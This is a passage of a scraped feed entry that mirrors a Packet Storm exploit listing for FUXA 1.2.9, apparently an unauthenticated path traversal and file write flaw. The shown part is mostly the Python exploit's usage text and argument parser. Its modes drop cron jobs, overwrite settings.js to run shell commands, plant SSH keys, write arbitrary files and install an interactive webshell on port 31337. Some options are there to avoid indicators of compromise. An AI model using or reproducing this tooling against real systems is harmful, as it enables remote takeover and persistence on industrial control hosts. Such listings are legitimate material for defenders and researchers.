–home-wordlist .\/client-usernames.txt\\\\n\\\\n\\”\\n \\” # Just prove the write primitive works:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode canary\\\\n\\\\n\\”\\n \\” # Drop a cron job that fires within 60s \u2014 works when FUXA runs\\\\n\\”\\n \\” # as root (docker default) without waiting for a FUXA restart:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode cron \\\\\\\\\\\\n\\”\\n \\” –cron-cmd ‘id \\u003e \/tmp\/fx-cron.txt 2\\u003e\\u00261’\\\\n\\\\n\\”\\n \\” # Replace settings.js so the next FUXA restart runs `id \\u003e \/tmp\/pwn`:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode settings-rce \\\\\\\\\\\\n\\”\\n \\” –appdata \/tmp\/FUXA-1.2.9\/server\/_appdata \\\\\\\\\\\\n\\”\\n \\” –cmd ‘id \\u003e \/tmp\/pwn 2\\u003e\\u00261’\\\\n\\\\n\\”\\n \\” # Drop an SSH key into the FUXA service user’s authorized_keys:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode ssh-key \\\\\\\\\\\\n\\”\\n \\” –home \/home\/anthony –pubkey ~\/.ssh\/id_ed25519.pub\\\\n\\\\n\\”\\n \\” # Drop an arbitrary file:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode drop \\\\\\\\\\\\n\\”\\n \\” –target \/etc\/cron.d\/pwn –payload-file .\/cron.txt\\\\n\\\\n\\”\\n \\” # Install an HTTP webshell listener via settings.js replacement,\\\\n\\”\\n \\” # then drop into an interactive REPL once FUXA restarts:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode webshell \\\\\\\\\\\\n\\”\\n \\” –appdata \/tmp\/FUXA-1.2.9\/server\/_appdata \\\\\\\\\\\\n\\”\\n \\” –ws-port 31337 –interact\\\\n\\\\n\\”\\n \\” # Same, but skip the canary write to minimize filesystem artifacts:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode webshell –no-canary \\\\\\\\\\\\n\\”\\n \\” –appdata \/tmp\/FUXA-1.2.9\/server\/_appdata –ws-port 31337\\\\n\\\\n\\”\\n \\” # Connect to an already-installed webshell (values printed by\\\\n\\”\\n \\” # the previous invocation):\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode webshell-exec \\\\\\\\\\\\n\\”\\n \\” –ws-host target –ws-port 31337 \\\\\\\\\\\\n\\”\\n \\” –ws-path \/_abc123 –ws-token SECRET –interact\\\\n\\”\\n ),\\n )\\n p.add_argument(\\”-u\\”, \\”–url\\”, required=True,\\n help=\\”FUXA base URL (e.g. http:\/\/10.10.185.14:1881)\\”)\\n p.add_argument(\\”–mode\\”, default=\\”canary\\”,\\n choices=[\\”recon\\”, \\”canary\\”, \\”settings-rce\\”, \\”ssh-key\\”,\\n \\”drop\\”, \\”cron\\”, \\”webshell\\”, \\”webshell-exec\\”],\\n help=\\”Exploit stage to run (default: canary)\\”)\\n p.add_argument(\\”–canary\\”, default=None,\\n help=\\”Override the canary write path (default: \\”\\n \\”\/tmp\/healthcheck \u2014 deliberately bland; no CVE ID in \\”\\n \\”the filename or content to avoid obvious IOCs).\\”)\\n p.add_argument(\\”–canary-content\\”, default=None,\\n help=\\”Path to a local file whose contents will be used as \\”\\n \\”the canary body. Overrides the built-in ‘healthcheck \\”\\n \\”ok\\\\\\\\n’ default. Use when you specifically want a \\”\\n \\”demo\/PoC marker file on the target.\\”)\\n p.add_argument(\\”–no-canary\\”, action=\\”store_true\\”,\\n help=\\”Skip the proof-of-write canary and go straight to \\”\\n \\”the mode-specific payload. Use when any extra \\”\\n \\”filesystem artifact is undesirable. You lose the \\”\\n \\”pre-flight diagnostic \u2014 if your main write fails, \\”\\n \\”there’s no earlier signal to distinguish a patched \\”\\n \\”server from a depth\/path misconfiguration.\\”)\\n p.add_argument(\\”–depth\\”, type=int, default=10,\\n help=\\”How many ‘..’ hops to climb out of appDir \\”\\n \\”(default: 10 \u2014 enough for any real install)\\”)\\n p.add_argument(\\”–timeout\\”, type=int, default=15)\\n p.add_argument(\\”–insecure\\”, action=\\”store_true\\”,\\n help=\\”Skip TLS verification\\”)\\n p.add_argument(\\”–proxy\\”, default=None,\\n help=\\”HTTP\/S proxy (e.g. http:\/\/127.0.0.1:8080) \u2014 useful \\”\\n \\”for Burp inspection\\”)\\n p.add_argument(\\”–quiet\\”, action=\\”store_true\\”)\\n p.add_argument(\\”–force\\”, action=\\”store_true\\”,\\n help=\\”Continue even if reachability or canary stages fail\\”)\\n \\n # mode=recon\\n p.add_argument(\\”–probe-root\\”, action=\\”store_true\\”,\\n help=\\”Active probe: attempt a 0-byte write to \/root\/ to \\”\\n \\”confirm whether FUXA is running as root. Leaves a \\”\\n \\”small marker file; clean up once you have exec.\\”)\\n p.add_argument(\\”–probe-home\\”, action=\\”store_true\\”,\\n help=\\”Active probe: iterate \/home\/\\u003cuser\\u003e\/ with 0-byte \\”\\n \\”writes across a candidate list (or –home-wordlist) \\”\\n \\”to infer the running user when paths don’t leak it \\”\\n \\”and \/root is not writable. Home dirs are typically \\”\\n \\”mode 0700, so a successful write strongly implies \\”\\n \\”FUXA runs as that user. Leaves marker files per \\”\\n \\”positive hit; clean up once you have exec.\\”)\\n p.add_argument(\\”–home-wordlist\\”, default=None,\\n help=\\”Path to a newline-separated file of usernames to \\”\\n \\”probe under \/home\/\\u003cuser\\u003e\/ (overrides the built-in \\”\\n \\”candidate list). ‘#’ comments and blank lines \\”\\n \\”ignored. Use when you have engagement-specific \\”\\n \\”naming conventions to try.\\”)\\n \\n # mode=settings-rce\\n p.add_argument(\\”–cmd\\”, default=None,\\n help=\\”Shell command to embed in the replacement settings.js\\”)\\n p.add_argument(\\”–appdata\\”, default=None,\\n help=\\”Absolute path to FUXA’s _appdata directory\\”)\\n \\n # mode=ssh-key\\n p.add_argument(\\”–pubkey\\”, default=None,\\n help=\\”Path to public key file to append\\”)\\n p.add_argument(\\”–home\\”, default=None,\\n help=\\”Home directory of the FUXA service user\\”)\\n \\n # mode=drop\\n p.add_argument(\\”–target\\”, default=None,\\n help=\\”Absolute path to drop the file at (mode=drop)\\”)\\n p.add_argument(\\”–payload-file\\”, default=None,\\n help=\\”Local file whose contents will be uploaded (mode=drop)\\”)\\n p.add_argument(\\”–file-type\\”, default=\\”bin\\”,\\n choices=[\\”bin\\”, \\”svg\\”],\\n help=\\”‘bin’ = base64-decoded write (any bytes); \\”\\n \\”‘svg’ = raw text write, no decoding (default: bin)\\”)\\n \\n # mode=cron\\n p.add_argument(\\”–cron-path\\”, default=\\”\/etc\/cron.d\/fuxa-health\\”,\\n help=\\”Absolute path the cron file is written to. \\”\\n \\”\/etc\/cron.d\/\\u003cname\\u003e is re-read every minute by cron \\”\\n \\”when FUXA runs as root. For a non-root FUXA user, \\”\\n \\”try \/var\/spool\/cron\/crontabs\/\\u003cuser\\u003e (Debian\/Vixie) \\”\\n \\”or \/var\/spool\/cron\/\\u003cuser\\u003e (RHEL\/cronie) \u2014 note \\”\\n \\”that those paths typically require mode 0600 \\”\\n \\”which the write primitive cannot set. \\”\\n \\”(default: \/etc\/cron.d\/fuxa-health)\\”)\\n p.add_argument(\\”–cron-schedule\\”, default=\\”* * * * *\\”,\\n help=\\”Cron schedule expression, five fields \\”\\n \\”(default: ‘* * * * *’ = every minute)\\”)\\n p.add_argument(\\”–cron-user\\”, default=None,\\n help=\\”User field for \/etc\/cron.d\/* and \/etc\/crontab \\”\\n \\”(auto-inferred as ‘root’ for those paths). \\”\\n \\”Pass ” (empty) to force omission for user-crontab \\”\\n \\”format.\\”)\\n p.add_argument(\\”–cron-cmd\\”, default=None,\\n help=\\”Command cron will execute (required for mode=cron). \\”\\n \\”Will be passed to \/bin\/sh via the cron line.\\”)\\n \\n # mode=webshell + mode=webshell-exec\\n p.add_argument(\\”–ws-port\\”, type=int, default=31337,\\n help=\\”TCP port the in-process webshell listener will bind \\”\\n \\”on the target. Must be free, firewall-reachable \\”\\n \\”from the operator, and distinct from FUXA’s UI \\”\\n \\”port (default: 31337).\\”)\\n p.add_argument(\\”–ws-path\\”, default=None,\\n help=\\”URL path the webshell listens on. Anything else \\”\\n \\”returns 404. Default: random 24-hex-char path \\”\\n \\”printed after deployment.\\”)\\n p.add_argument(\\”–ws-token\\”, default=None,\\n help=\\”Auth token required on every request (X-Auth-Token \\”\\n \\”header or ?t= query). Default: random 24-byte \\”\\n \\”urlsafe token printed after deployment.\\”)\\n p.add_argument(\\”–ws-host\\”, default=None,\\n help=\\”Host to connect to for mode=webshell-exec \/ \\”\\n \\”–interact. Defaults to the host portion of –url.\\”)\\n p.add_argument(\\”–ws-tls\\”, action=\\”store_true\\”,\\n help=\\”Use https:\/\/ when talking to the webshell endpoint \\”\\n \\”(the embedded listener is plain HTTP by default).\\”)\\n p.add_argument(\\”–ws-cmd\\”, default=None,\\n help=\\”Single command to execute via mode=webshell-exec \\”\\n \\”(mutually exclusive with –interact).\\”)\\n p.add_argument(\\”–interact\\”, action=\\”store_true\\”,\\n help=\\”After deploying (mode=webshell) or connecting \\”\\n \\”(mode=webshell-exec), enter an interactive REPL \\”\\n \\”that ships commands to the in-process listener \\”\\n \\”and prints stdout\/stderr.\\”)\\n \\n return p.parse_args(argv)\\n \\n \\n def main(argv: Optional[list[str]] = None) -\\u003e int:\\n args = parse_args(argv if argv is not None else sys.argv[1:])\\n try:\\n return run(args)\\n except KeyboardInterrupt:\\n print(\\”\\\\n[!] Interrupted.\\”, flush=True)\\n return 130\\n \\n \\n if __name__ == \\”__main__\\”:\\n raise SystemExit(main())”,”sourceHref”:”https:\/\/packetstorm.news\/download\/221750″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/221750\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-21T16:30:21″,”description”:”FUXA versions 1.2.9 and below suffers from an unauthenticated path traversal vulnerability that leads to arbitrary file write that enables remote code execution…”,”published”:”2026-05-21T00:00:00″,”modified”:”2026-05-21T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FUXA 1.2.9…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-56106","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n